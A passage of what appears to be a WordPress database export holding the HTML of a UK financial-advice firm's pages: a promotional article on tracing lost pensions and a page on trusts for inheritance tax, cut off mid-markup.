Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Tracking Down Your Lost Pension										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Tracking Down Your Lost Pension</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n				<div id=\"post-6844\" class=\"post-6844 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Tracking Down Your Lost Pension</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><a href=\"#\"/>Are you one of the thousands who have a missing or lost pension?</p>&#13;\n<p>During the working lifetime of most people in the UK, we may well slog through as little as five different jobs, or as many as 20, meaning we have lots of pensions scattered about.</p>&#13;\n<p>While some of these jobs will inevitably not have had a pension scheme (temporary work positions etc), many would have had you enrolled onto the pension scheme either by mandatory enrollment or from your request.</p>&#13;\n<p>The Government estimate by 2050 that there could be £750 billion in lost workplace pensions!!</p>&#13;\n<p>This could mean that many people will ultimately have unclaimed pension funds sitting around waiting to be cashed in, transferred to be improved upon or for those approaching retirement provide a much welcome boost to their income.</p>&#13;\n<p> </p>&#13;\n<h2>What is Pension Tracking?</h2>&#13;\n<p>Pension tracking is not a concept we are told enough about with increasing numbers of people getting complacent and not doing anything about unclaimed pension money sitting around.</p>&#13;\n<p>There can be many reasons for this, the common ones are:</p>&#13;\n<ul><li>Just to busy and not enough time or energy to get to today.</li>&#13;\n<li>Don’t know were to start.</li>&#13;\n<li>Believing that a small pension pot being to low to bother about.</li>&#13;\n<li>Thinking that it will be doing ok where it is – where ever that is!!</li>&#13;\n</ul><p>Pension tracing is not just  worthwhile exercise to undertake but could be one of the easiest ways to  find you a lot of hidden wealth locked into low performing pensions and pensions you completely forgotten about.</p>&#13;\n<p>In many cases you do not have to wait until you are 65 before accessing your pension. Many company pensions allow you to cash in when you reach 55.  But wanting to retire early, and actually being able to afford to retire early, can be unrealistic.</p>&#13;\n<p>Let’s say you are made aware of what your retirement income is likely to be, this may well help you to decide the ideal date or the actual date when you can retire comfortably.</p>&#13;\n<p>It is now possible to amalgamate under performing pensions and pensions with contracts that have poor charges charges into one single pension plan that could see your money perform considerably better than where it may well be sitting now.</p>&#13;\n<p style=\"text-align: center;\">So, where do you start when you want to track down lost pensions or do a spot of pension tracing?</p>&#13;\n<p>You could contact the Department for Work and Pensions (DWP) and ask for the Pensions Tracing team. It has more than 200,000 company schemes and personal pension plans on its books</p>&#13;\n<p>Experians unclaimed asset register has a data base of million of records and has some success.</p>&#13;\n<p>Alternatively, you could employ the services of pension tracking experts, like Equity SMART, who have over 20 years experience in all pension tracing and pension-related matters.</p>&#13;\n<p>With just a few details about any pension schemes you had, some personal details and dates when you believed you contributed, they can also try to trace your pension details.</p>&#13;\n<p>Once all the information has been collated, Equity SMART will provide you with a transfer analysis report giving you all the facts – figures  pros &amp; cons and if right for you  transfer all under performing pensions into one brand new, single pension arrangement.</p>&#13;\n<p>A little bit of pension tracing may unlock some valuable pension benefits – or a little unexpected lost treasure, at the end of the working life rainbow.</p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>Do You Have A Lost Pension?</h2><p>Contact us today for free pension advice or to speak to one of pension tracking experts. Click the button to get in touch</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n							</div>&#13;\n											</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\"><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">&#13;\n										<img width=\"52\" height=\"34\" src=\"../wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n									<div class=\"meta\">&#13;\n										February 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n									<div class=\"meta\">&#13;\n										February 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n									<div class=\"meta\">&#13;\n										January 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 31st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (2)</option><option class=\"level-0\" value=\"4\">Pensions  (4)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (8)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul></div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Tracking Down Your Lost Pension and Pension Tracking','Are you one of the thousands who have a missing or lost pension? Find out more about lost or missing pensions and how pension tracking can help you.','publish','closed','closed','','tracking-down-your-lost-pension-and-pension-tracking','','','2017-09-21 16:34:41','2017-09-21 16:34:41','',0,'http://www.equalitywalk.org.uk/tracking-down-your-lost-pension-and-pension-tracking',0,'page','',0),(110,1,'2017-09-21 16:34:41','2017-09-21 16:34:41','<body bgcolor=\"#ffffff\" onload=\"MM_preloadImages(\'images/investments_r4_c1_f2.jpg\',\'images/investments_r4_c6_f2.jpg\',\'images/investments_r4_c9_f2.jpg\',\'../images/investments_r4_c11_f2.jpg\',\'images/investments_r4_c12_f2.jpg\',\'images/investments_r4_c15_f2.jpg\',\'images/investments_r4_c16_f2.jpg\');\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n<div style=\"position:absolute; top:0px; left:50%; margin-left:-475px\">&#13;\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"950\"><tr><td><img src=\"../images/spacer.gif\" width=\"10\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"18\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"14\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"49\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"78\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"16\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"30\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"44\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"118\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"11\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"138\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"129\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"19\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" class=\"header\" style=\"background-image:url(../images/index_r1_c1.jpg); background-repeat:no-repeat\"><a href=\"../wealth-management-faqs/\">wealth management FAQs</a> -  <a href=\"../wealth-management-glossary/\">glossary of wealth management terms</a> - <a href=\"../additional/financial-calendar/\">financial calendar</a></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"38\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"27\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"9\"><a href=\"/\"><img name=\"investments_r3_c1\" src=\"../images/investments_r3_c1.jpg\" width=\"353\" height=\"96\" border=\"0\" id=\"investments_r3_c1\" alt=\"Wealth Management - Financial Advice and Information\" /></a></td>&#13;\n   <td colspan=\"8\" valign=\"top\"><div style=\"font-size:19px; text-align:right; margin-right:30px\">Offices throughout the UK,<br />&#13;\n     call us for expert financial advice - &#13;\n     <span style=\"color:#600\"><span class=\"adinsightNumber1901\"></span></span>&#13;\n<script type=\"text/javascript\" src=\"../jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n  google.load(\'search\', \'1\');\r\n  google.setOnLoadCallback(function() {\r\n    google.search.CustomSearchControl.attachAutoCompletion(\r\n      \'011057125409238421392:utfk3c-gm7e\',\r\n      document.getElementById(\'q\'),\r\n      \'cse-search-box\');\r\n  });\r\n]]></script><form action=\"../search-results/\" id=\"cse-search-box\">&#13;\n  <div>&#13;\n    <input type=\"hidden\" name=\"cx\" value=\"011057125409238421392:utfk3c-gm7e\" /><input type=\"hidden\" name=\"cof\" value=\"FORID:9\" /><input type=\"hidden\" name=\"ie\" value=\"UTF-8\" /><input type=\"text\" name=\"q\" id=\"q\" autocomplete=\"on\" size=\"21\" /><input type=\"submit\" name=\"sa\" value=\"Search our Site\" /></div>&#13;\n&#13;\n<script type=\"text/javascript\" src=\"../cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script></form></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"96\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"5\"><a href=\"/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c1\',\'\',\'images/investments_r4_c1_f2.jpg\',1);\"><img name=\"investments_r4_c1\" src=\"../images/investments_r4_c1.jpg\" width=\"120\" height=\"50\" border=\"0\" id=\"investments_r4_c1\" alt=\"Home Page\" /></a></td>&#13;\n   <td colspan=\"3\"><a href=\"../pension/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c6\',\'\',\'images/investments_r4_c6_f2.jpg\',1);\"><img name=\"investments_r4_c6\" src=\"../images/investments_r4_c6.jpg\" width=\"124\" height=\"50\" border=\"0\" id=\"investments_r4_c6\" alt=\"Pension Advice\" /></a></td>&#13;\n   <td colspan=\"2\"><a href=\"..\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c9\',\'\',\'images/investments_r4_c9_f2.jpg\',1);\"><img name=\"investments_r4_c9\" src=\"../images/investments_r4_c9.jpg\" width=\"153\" height=\"50\" border=\"0\" id=\"investments_r4_c9\" alt=\"Savings &amp; Investments\" /></a></td>&#13;\n   <td><a href=\"javascript:;\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c11\',\'\',\'../images/investments_r4_c11_f2.jpg\',1);\"><img name=\"investments_r4_c11\" src=\"../images/investments_r4_c11_f2.jpg\" width=\"109\" height=\"50\" border=\"0\" id=\"investments_r4_c11\" alt=\"Trusts and Bonds\" /></a></td> <td colspan=\"3\"><a href=\"../wealth-platform/\" onmouseout=\"MM_swapImgRestore()\" onmouseover=\"MM_swapImage(\'index_r4_c11\',\'\',\'images/index_r4_c11_f2.jpg\',1);\"><img name=\"index_r4_c11\" src=\"../images/index_r4_c11.jpg\" width=\"158\" height=\"50\" border=\"0\" id=\"index_r4_c11\" alt=\"Wealth Management\" /></a></td>&#13;\n   <td><a href=\"../about-us/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c15\',\'\',\'images/investments_r4_c15_f2.jpg\',1);\"><img name=\"investments_r4_c15\" src=\"../images/investments_r4_c15.jpg\" width=\"138\" height=\"50\" border=\"0\" id=\"investments_r4_c15\" alt=\"About Us\" /></a></td>&#13;\n   <td colspan=\"2\"><a href=\"../contact-us/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c16\',\'\',\'images/investments_r4_c16_f2.jpg\',1)\"><img name=\"investments_r4_c16\" src=\"../images/investments_r4_c16.jpg\" width=\"148\" height=\"50\" border=\"0\" id=\"investments_r4_c16\" alt=\"Contact Us\" /></a></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"50\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"9\"><img name=\"investments_r5_c1\" src=\"../images/investments_r5_c1.jpg\" width=\"10\" height=\"545\" border=\"0\" id=\"investments_r5_c1\" alt=\"\" /></td>&#13;\n   <td colspan=\"15\"><div id=\"breadcrumb\"><a href=\"/\">home</a> &gt; trusts and protection</div>&#13;\n     <h1>Trusts &amp; Protection</h1></td>&#13;\n   <td rowspan=\"4\"><img name=\"investments_r5_c17\" src=\"../images/investments_r5_c17.jpg\" width=\"19\" height=\"260\" border=\"0\" id=\"investments_r5_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"63\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"6\"><img name=\"investments_r6_c2\" src=\"../images/investments_r6_c2.jpg\" width=\"204\" height=\"9\" border=\"0\" id=\"investments_r6_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"9\" rowspan=\"8\" valign=\"top\"><img src=\"../images/trust-bond.jpg\" alt=\"Trusts and Protection\" name=\"investments_r6_c8\" width=\"450\" height=\"197\" border=\"0\" align=\"left\" id=\"investments_r6_c8\" /><div class=\"paracontent2\">&#13;\n     <p>The Right Type of Trust Will Offer Your Loved Ones Protection and  Security</p>&#13;\n     <p>       If you are using a trust for Inheritance Tax  planning, it is important to take care that you create the correct type of  trust for your needs. </p>&#13;\n     <p> You should also take care as to how many trusts are  created and the type of <a href=\"../asset-protection/\">assets</a> which are to be held in each trust. The timing  of creating the trust as opposed to other gifts should also be taken into  account.</p>&#13;\n     <p> All assets held within a trust are subject to tax under UK tax laws. This means that if you  place assets in a trust, they will be liable for taxation. It is important that  this factor should be born in mind when setting up a trust.  For taxation purposes, trusts are normally settled during the lifetime of the  person involved. These trusts fall into two categories, either <a href=\"../absolute-trust/\">Absolute  Trusts</a> or Bare Trusts or, alternatively, Flexible of <a href=\"../discretionary-\">Discretionary  Trusts</a>.</p>&#13;\n<p> A bare trust sets out the beneficiaries and this is fixed and cannot be altered  at a later date, whatever the circumstances. The beneficiaries of this type of  trust have a right to any assets held in the trust upon the age of eighteen.  &#13;\n  A Discretionary  Trust is similar in that the beneficiaries are named, but the trustees are  given a role to advance income or other assets should they feel that this is  appropriate for the circumstances involved.</p>&#13;\n<div align=\"center\" style=\"padding-top:1px\"><img src=\"../images/go-button.gif\" width=\"550\" height=\"66\" alt=\"Pension Advice\" /></div>&#13;\n     </div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"9\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"2\" rowspan=\"7\" valign=\"top\"><img name=\"investments_r7_c2\" src=\"../images/investments_r7_c2.jpg\" width=\"32\" height=\"473\" border=\"0\" id=\"investments_r7_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"3\" valign=\"top\" class=\"related\" style=\"background-image:url(../images/investments_r7_c4.jpg); background-repeat:no-repeat\">Related Pages</td>&#13;\n   <td rowspan=\"7\" valign=\"top\"><img name=\"investments_r7_c7\" src=\"../images/investments_r7_c7.jpg\" width=\"16\" height=\"473\" border=\"0\" id=\"investments_r7_c7\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"34\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" rowspan=\"5\" valign=\"top\" class=\"relatedlinks\" style=\"background-image:url(../images/investments_r13_c4.jpg); background-position:bottom; background-repeat:no-repeat\"><a href=\"../asset-protection/\">Asset Protection Trust</a> <br />&#13;\n     